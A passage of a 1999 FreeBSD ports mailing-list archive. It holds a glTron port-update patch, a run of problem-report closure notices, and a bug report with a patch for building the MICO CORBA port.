1999/08/25 07:03:55 cpiazza Exp $ # -DISTNAME= glTron-0.43 -PKGNAME= gltron-0.43 +DISTNAME= glTron-0.46 +PKGNAME= gltron-0.46 CATEGORIES= games MASTER_SITES= http://www.ards.net/Andreas/ diff -Nru gltron/files/md5 gltron-0.46/files/md5 --- gltron/files/md5 Wed Aug 25 14:15:21 1999 +++ gltron-0.46/files/md5 Thu Dec 23 15:42:34 1999 @@ -1 +1 @@ -MD5 (glTron-0.43.tar.gz) = f1b0cb19e7394a97118ef9d240268e11 +MD5 (glTron-0.46.tar.gz) = faeaddeba285a46c8773a8307f60392a diff -Nru gltron/patches/patch-aa gltron-0.46/patches/patch-aa --- gltron/patches/patch-aa Wed Aug 25 14:15:22 1999 +++ gltron-0.46/patches/patch-aa Thu Dec 23 15:57:14 1999 @@ -1,23 +1,28 @@ ---- Makefile Sun Aug 22 23:00:24 1999 -+++ /home/andy/tmp/wrk/Makefile Mon Aug 23 10:22:43 1999 -@@ -1,10 +1,11 @@ +--- Makefile Sun Oct 3 17:27:05 1999 ++++ /home/andy/tmp/wrk/Makefile Thu Dec 23 15:57:00 1999 +@@ -1,13 +1,13 @@ # Makefile for gltron -XLIBS = -L/usr/X11/lib -L/usr/X11R6/lib -lX11 -lXext -lXmu -lXt -lXi -lSM -lICE -lm +XLIBS = -L$(X11BASE)/lib -lX11 -lXext -lXmu -lXt -lXi -lSM -lICE -lm --GL_LIBS = -lMesaGL -lMesaGLU -lglut $(XLIBS) -+GL_LIBS = -lMesaGL -lMesaGLU -lglut + GL_LIBS = -lMesaGL -lMesaGLU -lglut + + SNDLIBS = `libmikmod-config --cflags` `libmikmod-config --libs` -CC = gcc -+CFLAGS+= -I$(X11BASE)/include +-COMPILE = -c -pedantic -Wall -g +CC ?= gcc - DEBUG = -g -pedantic - # RELEASE = -O2 -pedantic crashes (why?) - RELEASE = -pedantic -@@ -15,4 +16,4 @@ - $(CC) $(DEBUG) -o gltron gltron.c $(GL_LIBS) $(XLIBS) - - gltron: gltron.c gltron.h gltron_tex.h gltron_wall.h -- $(CC) $(RELEASE) -o gltron gltron.c $(GL_LIBS) $(XLIBS) -+ $(CC) $(CFLAGS) -o gltron gltron.c $(GL_LIBS) $(XLIBS) ++COMPILE = $(CFLAGS) -I$(X11BASE)/include -c + DEBUG = -g + RELEASE = -O2 + +@@ -22,7 +22,7 @@ + fragments: character.o computer.o texture.o input.o settings.o + + gltron: gltron_source fragments +- $(CC) $(RELEASE) -o gltron $(OBJ) $(GL_LIBS) $(XLIBS) ++ $(CC) -o gltron $(OBJ) $(GL_LIBS) $(XLIBS) + + gltron_source: gltron.c gltron.h globals.h + $(CC) $(COMPILE) gltron.c diff -Nru gltron/patches/patch-ab gltron-0.46/patches/patch-ab --- gltron/patches/patch-ab Sun Aug 1 08:17:36 1999 +++ gltron-0.46/patches/patch-ab Thu Jan 1 03:00:00 1970 @@ -1,23 +0,0 @@ ---- gltron.c.orig Sun Aug 1 21:03:53 1999 -+++ gltron.c Sun Aug 1 21:03:56 1999 -@@ -17,6 +17,9 @@ - */ - - #include "gltron.h" -+#ifdef __FreeBSD__ -+#include -+#endif - - void setCol(int x, int y) { - int offset, mask; -@@ -657,6 +660,10 @@ - }; - - int win_id; -+ -+#ifdef __FreeBSD__ -+ fpsetmask(0); -+#endif - - glutInit(&argc, argv); - glutInitWindowSize(WIN_WIDTH, WIN_HEIGHT); >How-To-Repeat: >Fix: Please, check and apply this patch. >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 5:20:37 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6386B15623; Thu, 23 Dec 1999 05:20:36 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA19494; Thu, 23 Dec 1999 05:20:36 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 05:20:36 -0800 (PST) From: Message-Id: <199912231320.FAA19494@freefall.freebsd.org> To: vince@pele.WURLDLINK.NET, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15641: rzsz port no longer compiles because checksum changed Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: rzsz port no longer compiles because checksum changed State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 05:20:09 PST 1999 State-Changed-Why: Duplicate of ports/14798 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 5:23:53 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0159B155F9; Thu, 23 Dec 1999 05:23:52 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA19749; Thu, 23 Dec 1999 05:23:51 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 05:23:51 -0800 (PST) From: Message-Id: <199912231323.FAA19749@freefall.freebsd.org> To: vince@pele.WURLDLINK.NET, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15643: bjorb port fails to build Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: bjorb port fails to build State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 05:23:31 PST 1999 State-Changed-Why: Duplicate of ports/14888 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 5:42:54 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 16A451571F; Thu, 23 Dec 1999 05:42:51 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id FAA21036; Thu, 23 Dec 1999 05:42:50 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 05:42:50 -0800 (PST) From: Message-Id: <199912231342.FAA21036@freefall.freebsd.org> To: andy@icc.surw.chel.su, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15602: Update port: editors/gedit Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: editors/gedit State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 05:42:40 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 6:17:22 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 43EF414FC7; Thu, 23 Dec 1999 06:17:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA23778; Thu, 23 Dec 1999 06:17:21 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 06:17:21 -0800 (PST) From: Message-Id: <199912231417.GAA23778@freefall.freebsd.org> To: andrews@technologist.com, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15507: new port: devel/robodoc Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: new port: devel/robodoc State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 06:12:01 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 6:50:29 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 7CDBD1572E; Thu, 23 Dec 1999 06:50:22 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Received: (from jedgar@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA80065; Thu, 23 Dec 1999 06:50:22 -0800 (PST) (envelope-from jedgar@FreeBSD.org) Date: Thu, 23 Dec 1999 06:50:22 -0800 (PST) From: Message-Id: <199912231450.GAA80065@freefall.freebsd.org> To: dr@domix.de, jedgar@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15624: tirc-1.2.tar.gz MD5sum invalid Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: tirc-1.2.tar.gz MD5sum invalid State-Changed-From-To: open->closed State-Changed-By: jedgar State-Changed-When: Thu Dec 23 06:49:44 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 7:35:38 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9EB5914D89; Thu, 23 Dec 1999 07:35:37 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA84292; Thu, 23 Dec 1999 07:35:37 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 07:35:37 -0800 (PST) From: Message-Id: <199912231535.HAA84292@freefall.freebsd.org> To: matt@zigg.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15120: [PATCH] mail/pine4 pgp support does not honor PREFIX Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] mail/pine4 pgp support does not honor PREFIX State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 07:34:11 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 7:38:55 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 558FB156C2; Thu, 23 Dec 1999 07:38:54 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA84697; Thu, 23 Dec 1999 07:38:54 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 07:38:54 -0800 (PST) From: Message-Id: <199912231538.HAA84697@freefall.freebsd.org> To: andrews@technologist.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15130: update port: www/hypermail Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update port: www/hypermail State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 07:37:24 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 7:40:31 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A75951579B; Thu, 23 Dec 1999 07:40:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA84892; Thu, 23 Dec 1999 07:40:28 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 07:40:28 -0800 (PST) From: Message-Id: <199912231540.HAA84892@freefall.freebsd.org> To: matt@zigg.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15137: [PATCH] www/lynx-ssl can't find OpenSSL if installed w/ PREFIX Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] www/lynx-ssl can't find OpenSSL if installed w/ PREFIX State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 07:39:35 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 7:51:14 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D7A8A14BFA; Thu, 23 Dec 1999 07:51:13 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA85886; Thu, 23 Dec 1999 07:51:11 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 07:51:11 -0800 (PST) From: Message-Id: <199912231551.HAA85886@freefall.freebsd.org> To: midom@dammit.lt, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15143: update to freetds port (new release) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update to freetds port (new release) State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 07:42:55 PST 1999 State-Changed-Why: Superceded by ports/15453. I'll commit that one shortly. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 7:58:44 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 233F915706; Thu, 23 Dec 1999 07:58:23 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA86748; Thu, 23 Dec 1999 07:58:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 07:58:22 -0800 (PST) From: Message-Id: <199912231558.HAA86748@freefall.freebsd.org> To: nobutaka@nobutaka.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15148: Update port: graphics/gimp1-i18n Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: graphics/gimp1-i18n State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 07:57:38 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8: 0: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E609414C93 for ; Thu, 23 Dec 1999 08:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA86920; Thu, 23 Dec 1999 08:00:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 1D25015887; Thu, 23 Dec 1999 07:59:04 -0800 (PST) Message-Id: <19991223155904.1D25015887@hub.freebsd.org> Date: Thu, 23 Dec 1999 07:59:04 -0800 (PST) From: vadim@gc.lviv.ua To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: ports/15647: MICO: doesn't compiles and mico-ld links only static Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15647 >Category: ports >Synopsis: MICO: doesn't compiles and mico-ld links only static >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-ports >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Thu Dec 23 08:00:01 PST 1999 >Closed-Date: >Last-Modified: >Originator: Vadim Chekan >Release: 3.2-STABLE >Organization: Galitian Contracts >Environment: FreeBSD gate.gc.lviv.ua 3.2-STABLE FreeBSD 3.2-STABLE #0: Sat Dec 4 14:17:05 EE T 1999 vadim@gate.gc.lviv.ua:/usr/src/sys/compile/GATE.3 i386 >Description: When I try to make /usr/ports/devel/mico g++295 -I. -I../../include -O -pipe -ftemplate-depth-42 -fno-exceptions -fex ceptions -O0 -I/usr/local/include/tcl8.0 -I/usr/X11R6/include/X11/qt -c TimeSer vice_help.cc -o TimeService_help.o TimeService_help.cc: In function `TimeT getTimezone()': TimeService_help.cc:63: implicit declaration of function `int ftime(...)' gmake[2]: *** [TimeService_help.o] Error 1 gmake[2]: Leaving directory `/usr/ports/devel/mico/work/mico/coss/time' gmake[1]: *** [subprg] Error 1 gmake[1]: Leaving directory `/usr/ports/devel/mico/work/mico/coss' gmake: *** [system] Error 1 *** Error code 2 Stop. =================== It's because ftime() on FreeBSD isn't supported already. Patch is applied. Second problem: linking simple example I get executable 3.9Mb! remove /usr/local/lib/mico2.3.0.a ldconfig -R mico-ld -o stat account.o main.o -lm -lmico2.3.0 It can't link! It doesn't see libmico.2.3.0.so -> /usr/local/lib/libmico2.3.0.so.1 Ok, ln -s libmico.so /usr/local/lib/libmico2.3.0.so.1 ldconfig -R mico-ld -o dynamic account.o main.o -lm -lmico It links and size of dynamic is 171K I guess linker doesn't see shared lib because of digits in it's name Fix: add link from libmico.so -> libmico2.3.0.so.1 ? >How-To-Repeat: cd /usr/ports/devel/mico make >Fix: man ftime says: This interface is obsoleted by gettimeofday(2) man gettimeofday says: Note: timezone is no longer used; this information is kept outside the kernel. but we need exactly timezone. So use localtime() ftime return timezone offset in minutes, localtime in seconds, so divide it by 60. --- TimeService_help.cc Thu Dec 23 17:30:15 1999 +++ TimeService_help.cc.new Thu Dec 23 14:32:56 1999 @@ -26,7 +26,6 @@ #include "CosTime.h" #include #include -#include // //Helper functions, mainly wrappers around the time function @@ -59,10 +58,10 @@ TimeBase::TimeT getTimezone() { //obtain timezone - timeb timestruct; - ftime(×truct); + time_t timev = time(0); + struct tm *local_tm = localtime(&timev); - TimeBase::TdfT displacementV = timestruct.timezone; + TimeBase::TdfT displacementV = local_tm->tm_gmtoff % 60; return displacementV; } >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8: 1:41 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 53E6715849; Thu, 23 Dec 1999 08:01:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA87172; Thu, 23 Dec 1999 08:01:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:01:22 -0800 (PST) From: Message-Id: <199912231601.IAA87172@freefall.freebsd.org> To: wolman@cs.washington.edu, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15154: update the p5-SQL-Statement port to version 0.1016 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update the p5-SQL-Statement port to version 0.1016 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:00:08 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8: 3:49 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5DA1A15805; Thu, 23 Dec 1999 08:03:38 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA87577; Thu, 23 Dec 1999 08:03:38 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:03:38 -0800 (PST) From: Message-Id: <199912231603.IAA87577@freefall.freebsd.org> To: winard@ritax.dorm.ccu.edu.tw, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15453: Update FreeTDS from 0.47pre2 to 0.50 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update FreeTDS from 0.47pre2 to 0.50 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:02:38 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8: 6: 6 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 1C0BF1567D; Thu, 23 Dec 1999 08:06:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA88040; Thu, 23 Dec 1999 08:06:05 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:06:05 -0800 (PST) From: Message-Id: <199912231606.IAA88040@freefall.freebsd.org> To: kbyanc@posi.net, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15166: update udmsearch port to 2.2.1 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update udmsearch port to 2.2.1 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:04:33 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8: 8: 5 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 17163157DF; Thu, 23 Dec 1999 08:07:57 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA88342; Thu, 23 Dec 1999 08:07:57 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:07:57 -0800 (PST) From: Message-Id: <199912231607.IAA88342@freefall.freebsd.org> To: tom@FreeBSD.org, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15170: Update Port: leafnode+ Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update Port: leafnode+ State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:06:33 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:10:58 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 19B1315693; Thu, 23 Dec 1999 08:10:57 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA88717; Thu, 23 Dec 1999 08:10:56 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:10:56 -0800 (PST) From: Message-Id: <199912231610.IAA88717@freefall.freebsd.org> To: ambrisko@whistle.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15173: Update Etherboot 4.2.11 Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update Etherboot 4.2.11 State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:10:43 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:12:42 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5D81E15718; Thu, 23 Dec 1999 08:12:29 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA89034; Thu, 23 Dec 1999 08:12:29 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:12:29 -0800 (PST) From: Message-Id: <199912231612.IAA89034@freefall.freebsd.org> To: martti.kuparinen@ericsson.com, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15188: [PATCH] ports/mail/p5-IMAP-Admin upgrade Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: [PATCH] ports/mail/p5-IMAP-Admin upgrade State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:11:25 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:15:20 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id A018B14EE7; Thu, 23 Dec 1999 08:15:19 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA89541; Thu, 23 Dec 1999 08:15:18 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:15:18 -0800 (PST) From: Message-Id: <199912231615.IAA89541@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15223: Update port: audio/mpeg-lib Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: audio/mpeg-lib State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:13:37 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:18:57 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 3DAB7156A5; Thu, 23 Dec 1999 08:18:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA90194; Thu, 23 Dec 1999 08:18:44 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:18:44 -0800 (PST) From: Message-Id: <199912231618.IAA90194@freefall.freebsd.org> To: tkato@prontomail.ne.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15226: Update port: misc/amanda Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Update port: misc/amanda State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:16:17 PST 1999 State-Changed-Why: Committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:20:24 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id DF13E1584F; Thu, 23 Dec 1999 08:20:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA90553; Thu, 23 Dec 1999 08:20:22 -0800 (PST) (envelope-from steve@FreeBSD.org) Date: Thu, 23 Dec 1999 08:20:22 -0800 (PST) From: Message-Id: <199912231620.IAA90553@freefall.freebsd.org> To: nobu@psrc.isac.co.jp, steve@FreeBSD.org, freebsd-ports@FreeBSD.org Subject: Re: ports/15237: update: ports/misc/fd (followup source distribution update) Sender: owner-freebsd-ports@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: update: ports/misc/fd (followup source distribution update) State-Changed-From-To: open->closed State-Changed-By: steve State-Changed-When: Thu Dec 23 08:19:09 PST 1999 State-Changed-Why: Update committed, thanks! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-ports" in the body of the message From owner-freebsd-ports Thu Dec 23 8:29:15 1999 Delivered-To: freebsd-ports@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 69B4215778; Thu, 23 Dec 1999 08:29:06 -0800 (PST) (envelope-from steve@FreeBSD.org) Received: (from steve@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id IAA91527; Thu, 